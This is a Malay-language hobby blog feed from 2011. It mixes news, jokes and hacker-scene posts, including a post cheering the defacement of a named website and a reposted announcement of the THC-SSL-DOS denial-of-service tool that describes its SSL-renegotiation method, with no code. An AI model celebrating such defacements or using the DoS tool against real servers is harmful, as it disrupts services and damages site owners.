</b></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b>haha</b></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b>mahu enak mas..</b></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b>jgn nekad</b></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b>pakai kondom mas</b></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b>kita selamat...</b></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b><br />
</b></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b>hahaha :D</b></span></div>Adios TDhttp://www.blogger.com/profile/00071510321782940313noreply@blogger.com2tag:blogger.com,1999:blog-5159176994329752150.post-66225318461531012052011-11-02T05:09:00.000+08:002011-11-02T05:09:43.547+08:00kena Deface :D<div style="text-align: center;">salam...mlm nie adios ad 1 entry yg bru adios dpt taw tdi...</div><div style="text-align: center;">nk taw x ap dy??</div><div style="text-align: center;"> nie hah...kowg tgk kt bwh tu....</div><div style="text-align: center;">laman web <a href="http://besttopsolutions.com/">http://besttopsolutions.com/</a> dihack oleh kambeng merah</div><div style="text-align: center;">lolz</div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrn_QoDWDq6-WR2FvhMU7-shSS-op0lVNnj44xjBOTuQInlomQ1NtHErNbXkrDNefw8qfv5wpHARNRR7i2frsSDo7D0qtZAUBdf03ttG4FYwf0Dv6vrUdq2_NfKBNrq4Bs_wnmrbmTItZX/s1600/kambeng1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrn_QoDWDq6-WR2FvhMU7-shSS-op0lVNnj44xjBOTuQInlomQ1NtHErNbXkrDNefw8qfv5wpHARNRR7i2frsSDo7D0qtZAUBdf03ttG4FYwf0Dv6vrUdq2_NfKBNrq4Bs_wnmrbmTItZX/s400/kambeng1.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">printscreen 1</td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxu_hWvrLNdkAi_9eW3W170OVxN7nh5XIBybiSqgH2dwkKKGv9Ha21TL2rR_nC4UIG6reUh-7BwJOQ-IP5W40jLayh_Q2OPX6HJwfgpQ2Mi1CYnY0mLzOsZZJqywkpHmeKP81U0S4seO5b/s1600/kambeng2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="251" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxu_hWvrLNdkAi_9eW3W170OVxN7nh5XIBybiSqgH2dwkKKGv9Ha21TL2rR_nC4UIG6reUh-7BwJOQ-IP5W40jLayh_Q2OPX6HJwfgpQ2Mi1CYnY0mLzOsZZJqywkpHmeKP81U0S4seO5b/s400/kambeng2.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">printscreen 2</td></tr>
</tbody></table><div style="text-align: center;">kesian kt <a href="http://besttopsolutions.com/" style="text-align: -webkit-auto;">http://besttopsolutions.com/</a> sbb kne dgn kambeng merah</div><div style="text-align: center;">kredit to kambeng merah :D</div>Adios TDhttp://www.blogger.com/profile/00071510321782940313noreply@blogger.com0tag:blogger.com,1999:blog-5159176994329752150.post-54877636244033126502011-11-02T04:05:00.000+08:002011-11-02T04:05:33.120+08:00maut?<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCASiOanrtUnWSRHiel8M604STezLTjHuscS77GyNqqdA_XyskeDJapVJl8ALxzHbT2sWWGrEO7hXQiE-9yTIopN0NEWk7a89eEEVAGAPeOWKwuVEyg_Ccp8CQf6tQ7tkn7f1tBycw7BP-/s1600/pix_gal1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCASiOanrtUnWSRHiel8M604STezLTjHuscS77GyNqqdA_XyskeDJapVJl8ALxzHbT2sWWGrEO7hXQiE-9yTIopN0NEWk7a89eEEVAGAPeOWKwuVEyg_Ccp8CQf6tQ7tkn7f1tBycw7BP-/s320/pix_gal1.jpg" width="320" /></a></div><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">dilaporkan hampir 200 orang penumpang kebanyakannya kakitangan kerajaan nyaris maut apabila kereta api dinaiki mereka merempuh sebuah lori tangki bermuatan 27,000 liter petrol yang menyebabkan letupan kuat di lintasan kereta api haram berhampiran Kilometer 5, Jalan Kota Kinabalu-Putatan, Petagas.</span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Letupan itu menyebabkan gegaran kuat di sekitar Petagas dengan asap tebal boleh dilihat dari jarak kira-kira lima kilometer (km), selain kesesakan lalu lintas yang teruk sepanjang kira-kira 10 km dari Jalan Kota Kinabalu-Putatan dan sebaliknya.</span><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: Arial, Verdana, Helvetica, sans-serif;">Dalam kejadian kira-kira jam 5.30 petang itu, lapan penumpang kereta api cedera ringan manakala pemandu lori berkenaan tidak cedera.</span><br style="font-family: Arial, Verdana, Helvetica, sans-serif; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /><br style="font-family: Arial, Verdana, Helvetica, sans-serif; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /><span class="Apple-style-span" style="font-family: Arial, Verdana, Helvetica, sans-serif;">Kereta api tiga gerabak itu dalam perjalanan dari Stesen Kereta Api Tanjung Aru, di sini membawa penumpang yang kebanyakannya kakitangan kerajaan yang baru pulang kerja ke Stesen Kereta Api Papar, kira-kira 70 km dari sini.</span><br style="font-family: Arial, Verdana, Helvetica, sans-serif; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /><br style="font-family: Arial, Verdana, Helvetica, sans-serif; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /><span class="Apple-style-span" style="font-family: Arial, Verdana, Helvetica, sans-serif;">Kereta api milik Jabatan Kereta Api Negeri Sabah (JKNS) itu dikatakan baru meninggalkan stesen berkenaan pada jam 5 petang dan dipercayai bergerak pada kelajuan antara 40 hingga 50 km sejam tetapi pemandunya dipercayai gagal memberhentikan kenderaan itu kerana agak hampir dengan lori berkenaan. </span><br style="font-family: Arial, Verdana, Helvetica, sans-serif; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /><br style="font-family: Arial, Verdana, Helvetica, sans-serif; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /><span class="Apple-style-span" style="font-family: Arial, Verdana, Helvetica, sans-serif;">Ia menyebabkan kepala dan gerabak pertama kereta api itu tergelincir ke kanan landasan sebelum hangus manakala lori itu terputus dua dengan bahagian kepala dan tangkinya terpisah kira-kira 10 meter di kiri dan kanan landasan. </span><br style="font-family: Arial, Verdana, Helvetica, sans-serif; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /><span class="Apple-style-span" style="font-family: Arial, Verdana, Helvetica, sans-serif;">Penumpang yang panik terpaksa memecahkan cermin kereta api dan melompat keluar bagi menyelamatkan diri daripada api yang menjulang setinggi kira-kira 30 meter.</span><br style="font-family: Arial, Verdana, Helvetica, sans-serif; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /><br style="font-family: Arial, Verdana, Helvetica, sans-serif; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /><span class="Apple-style-span" style="font-family: Arial, Verdana, Helvetica, sans-serif;">Pesuruhjaya Polis Sabah, Datuk Hamza Taib berkata, kejadian dipercayai berpunca akibat pemandu lori membelok ke kiri jalan untuk melintasi landasan sebelum membawa bahan api itu ke sebuah stesen minyak, kira-kira 300 meter dari tepi landasan.</span><br style="font-family: Arial, Verdana, Helvetica, sans-serif; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /><br style="font-family: Arial, Verdana, Helvetica, sans-serif; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /><span class="Apple-style-span" style="font-family: Arial, Verdana, Helvetica, sans-serif;">“Pemandu lori dipercayai gagal mengesan kereta api berkenaan tetapi sempat melompat keluar dari kenderaannya sejurus sebelum kenderaannya dirempuh kereta api," katanya ketika ditemui di tempat kejadian.</span><br />
<span class="Apple-style-span" style="font-family: Arial, Verdana, Helvetica, sans-serif;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: Arial, Verdana, Helvetica, sans-serif;">laporan asal: <a href="http://bharian.com.my/">Bharian.com.my</a></span>Adios TDhttp://www.blogger.com/profile/00071510321782940313noreply@blogger.com0tag:blogger.com,1999:blog-5159176994329752150.post-13814032341277758662011-11-02T03:06:00.000+08:002011-11-02T03:06:14.463+08:00Terbaik!!<div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b>salam</b></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b>arini adios nk post something tok kwan baru adios..</b></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b>adios knal dy lam fb...nk taw spe x....ok nie orngnye <a href="http://www.facebook.com/profile.php?id=100002994448309">Luffy</a>.</b></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b>sekarang nie dy tgh jd DJ kt laman web <a href="http://sayonara.caster.fm/">sayonara.caster.fm</a></b></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjss0cRIkHjz093zV3zSTMNJKHiZGhftb0S94_1FwqT8HZY8REQebAddY97WAW5bAy_KpZqcplyqzQ6d5eXiA18Gxy_tyINqCaGrvsjMMOYkMP4I6f-uYMqrabT19fqilwye1_90mGPIv5F/s1600/369253_100002994448309_120724036_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjss0cRIkHjz093zV3zSTMNJKHiZGhftb0S94_1FwqT8HZY8REQebAddY97WAW5bAy_KpZqcplyqzQ6d5eXiA18Gxy_tyINqCaGrvsjMMOYkMP4I6f-uYMqrabT19fqilwye1_90mGPIv5F/s400/369253_100002994448309_120724036_n.jpg" width="132" /></b></span></a></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b><br />
</b></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b><a href="http://sayonara.caster.fm/">sayonara.caster.fm</a>...DJ by <a href="http://www.facebook.com/profile.php?id=100002994448309">Luffy</a>...</b></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b>klo bosan2 ley nk lepak2 kt sne...</b></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b>kowg ley chat dgn adios kt sne(Adios TD)</b></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b>kire tmpt yg selalu adios lepak la...hehe</b></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b>nk wat ucapan?? bley...korang mntax jek kt DJ Luffy...</b></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b>comfirm dy bg...hehe..</b></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b>lagi satu info yg korang kne taw <a href="http://sayonara.caster.fm/">sayonara.caster.fm</a> merupakan radio rasmi kepada malaya hacker crew...nk taw yg mne? klik <a href="http://www.facebook.com/groups/172028722884754/">link</a> nie</b></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b>k la...klo ad info terbaru adios akan post lagi...</b></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b>adios amigo..hehe</b></span></div><div style="text-align: center;"><br />
</div>Adios TDhttp://www.blogger.com/profile/00071510321782940313noreply@blogger.com3tag:blogger.com,1999:blog-5159176994329752150.post-66338852736976616382011-11-02T02:43:00.000+08:002011-11-02T02:43:39.389+08:00Pelajar Bunuh Diri ????<div style="text-align: center;">ehem2 sory2...maaf la tajuk agak kasar sikit...</div><div style="text-align: center;">tpi nie la yg adios jmpe...</div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div style="text-align: center;">nk taw ap dy??</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCSt24CJ_8h1AxEjLcrhm0_M-TC_zHevKB4_9dnGKeg5_ZwddaaRYaLkBxsAxghmOMp8QSHe7sBWnYQzQ32ZtMDKSbtJt2LDcb8_XweMDZMBwJwE5DxTJsqdhKgP7zjo1Ae0eaCEZPgDe-/s1600/12.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="184" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCSt24CJ_8h1AxEjLcrhm0_M-TC_zHevKB4_9dnGKeg5_ZwddaaRYaLkBxsAxghmOMp8QSHe7sBWnYQzQ32ZtMDKSbtJt2LDcb8_XweMDZMBwJwE5DxTJsqdhKgP7zjo1Ae0eaCEZPgDe-/s320/12.jpg" width="320" /></a></div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><a href="http://malaysiahealthcareindonesia.com/login.html">http://malaysiahealthcareindonesia.com/login.html</a></div><div style="text-align: center;"><br />
</div><div style="text-align: center;">pengumuman....seorang hacker bername NoEntry telah membunuh dirinye setelah di troll oleh RileksCrew(RC) </div>Adios TDhttp://www.blogger.com/profile/00071510321782940313noreply@blogger.com0tag:blogger.com,1999:blog-5159176994329752150.post-59621344696655319572011-11-01T12:10:00.000+08:002011-11-01T12:10:58.001+08:00THC (Hackerz choice) new ddos(ssl) tool realeased :D<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKiMORuWPOEy11JDKNgrMHs1GTt2RB77_HHDyo5qomgpIMR6IvFP9yjk67XnZ0iR5bNXSmiMpHQV9Xi705EjI7pIY_wlOSpgO7eVGSGcVx8X_Wge7wmIY9pZIxJ7RqXB0jqdmUFgnNLm66/s1600/thc-welcome.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="230" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKiMORuWPOEy11JDKNgrMHs1GTt2RB77_HHDyo5qomgpIMR6IvFP9yjk67XnZ0iR5bNXSmiMpHQV9Xi705EjI7pIY_wlOSpgO7eVGSGcVx8X_Wge7wmIY9pZIxJ7RqXB0jqdmUFgnNLm66/s320/thc-welcome.png" width="320" /></a></div><div style="text-align: center;"><span class="Apple-style-span" style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><br />
</span></div><span class="Apple-style-span" style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;">Today the German hacker group “The Hacker’s Choice” officially released a new DDoS tool. The tool exploits a weakness in SSL to kick a server off the Internet.</span><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><span class="Apple-style-span" style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;">Technical details can be found at http://www.thc.org/thc-ssl-dos.</span><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><span class="Apple-style-span" style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;">“We decided to make the official release after realizing that this tool leaked to the public a couple of months ago” said a member of THC who wants to remain anonymous.</span><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><span class="Apple-style-span" style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;">The tool departs from traditional DDoS tools: It does not require any bandwidth and just a single attack computer (“bot”).</span><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><span class="Apple-style-span" style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;">The THC-SSL-DOS attack is en par with other resource exhausting DDoS attacks. Some of those methods played a vital role in demonstrations against oppressive governments (like the DDoS attack against Iran’s leader) and against companies that violate free speech (like the DDoS attack against Mastercard for closing Wikileak’s non-profit donation account because of an alleged typo/misspelling in the application form).</span><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><span class="Apple-style-span" style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;">“Here at THC the rights of the citizen and the freedom of speech are at the core of our research”, says a member of THC in a private interview this morning.</span><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><span class="Apple-style-span" style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;">“We are hoping that the fishy security in SSL does not go unnoticed. The industry should step in to fix the problem so that citizens are safe and secure again. SSL is using an aging method of protecting private data which is complex, unnecessary and not fit for the 21st century.”, Says a THC member, referring to 3 major vulnerabilities disclosed in SSL over the past 3 years.</span><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><span class="Apple-style-span" style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;">To list the 3 major vulnerabilities here THC explains: “In 2009 a vulnerability was disclosed that broke the encryption of SSL. De-facto making all SSL traffic unsafe. In 2011 various Certification Authorities got hacked. De-facto making all SSL traffic unsafe _again_.”</span><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><span class="Apple-style-span" style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;">“We warned in 2002 about giving hundreds of commercial companies (so called Certification Authorities) a master key to ALL SSL traffic.”, says Fred Mauer, a senior cryptographer at THC. “Only a real genius can come up with such an idea!”.</span><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><span class="Apple-style-span" style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;">“And last but not least the immense complexity of SSL Renegotiation strikes again in 2011 with the release of THC-SSL-DOS.”.</span><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><span class="Apple-style-span" style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;">“It’s time for a new security model that adequately protects the citizens.”.</span><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><span class="Apple-style-span" style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;">The THC-SSL-DOS tool is a Proof Of Concept tool to disclose fishy security in SSL. It works great if the server supports SSL Renegotiation. It still works if SSL Renegotiation is not supported but requires some modifications and more bots before an effect can be seen.</span><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><span class="Apple-style-span" style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;">Our tests reveal that the average server can be taken down from a single IBM laptop through a standard DSL connection.</span><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><span class="Apple-style-span" style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;">Taking on larger server farms who make use of SSL Load balancer required 20 average size laptops and about 120kbit/sec of traffic.</span><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><span class="Apple-style-span" style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;">All in all superb results.</span><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><span class="Apple-style-span" style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;">Interesting here is that a security feature that was supposed to make SSL more secure makes it indeed more vulnerable to this attack:</span><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><span class="Apple-style-span" style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;">SSL Renegotiation was invented to renegotiate the key material of an SSL connection. This feature is rarely used. In fact we could not find any software that uses SSL Renegotiation. Yet it’s enabled by default by most servers.</span><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><span class="Apple-style-span" style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;">An old saying comes true all over again: Complexity is the enemy of security.</span><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><br style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;" /><span class="Apple-style-span" style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;">“Renegotiating Key material is a stupid idea from a cryptography standpoint. If you are not happy with the key material negotiated at the start of the session then the session should be re-established and not re-negotiated”, says THC.</span><br />
<span class="Apple-style-span" style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;"><br />
</span><br />
<span class="Apple-style-span" style="background-color: white; color: #585757; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: left;">news by : <a href="http://www.ehackingnews.com/2011/10/thcthe-hackers-choice-ssl-dos-tool.html">click here to know :D</a></span>Adios TDhttp://www.blogger.com/profile/00071510321782940313noreply@blogger.com0tag:blogger.com,1999:blog-5159176994329752150.post-24020020932236266582011-11-01T11:59:00.000+08:002011-11-01T11:59:19.262+08:00For Football Fan Only :D<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTGHFbAbK7bzp093mwWcYBijDR1N9-QQ6q9qK9laXY3L2pdvguEV7LKfbvbLp5ZBOeVH19CzH4B1HKrY9k-74h-UuQz6F_Dz17T83tKhrojH0KnJ2ga12izcx-WK-XkL_r5Mc1UbOZlSWA/s1600/IRFAN-BAKTI2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTGHFbAbK7bzp093mwWcYBijDR1N9-QQ6q9qK9laXY3L2pdvguEV7LKfbvbLp5ZBOeVH19CzH4B1HKrY9k-74h-UuQz6F_Dz17T83tKhrojH0KnJ2ga12izcx-WK-XkL_r5Mc1UbOZlSWA/s1600/IRFAN-BAKTI2.jpg" /></a></div><div style="text-align: center;"><span style="background-color: whitesmoke;" title=""Mat Zan was Terengganu's coach when we won the Malaysia Cup in 2001 and he does seem interested in joining us again as he has agreed to come down to discuss terms and conditions with us sometime this week," he said."><span class="Apple-style-span" style="background-color: #f4f4f4; font-family: Arial, Verdana, Helvetica, sans-serif; font-size: 12px;">Irfan Bakti ( Coach Terengganu FC)</span></span></div><span style="background-color: whitesmoke;" title=""Mat Zan was Terengganu's coach when we won the Malaysia Cup in 2001 and he does seem interested in joining us again as he has agreed to come down to discuss terms and conditions with us sometime this week," he said."><span class="Apple-style-span" style="background-color: #f4f4f4; font-family: Arial, Verdana, Helvetica, sans-serif; font-size: 12px;"><br />
</span></span><br />
<span style="background-color: whitesmoke;" title=""Mat Zan was Terengganu's coach when we won the Malaysia Cup in 2001 and he does seem interested in joining us again as he has agreed to come down to discuss terms and conditions with us sometime this week," he said."><span class="Apple-style-span" style="background-color: #f4f4f4; font-family: Arial, Verdana, Helvetica, sans-serif; font-size: 12px;">IT'S Selangor and not Terengganu for Irfan Bakti next season.</span></span><br />
<div style="background-color: #f4f4f4; font-family: Arial, Verdana, Helvetica, sans-serif; font-size: 12px; text-align: left;">The 60-year-old coach, who guided Terengganu to the FA Cup title and runners-up finishes in the Super League and Malaysia Cup, ended his relationship with the east coast side yesterday.<br />
<br />
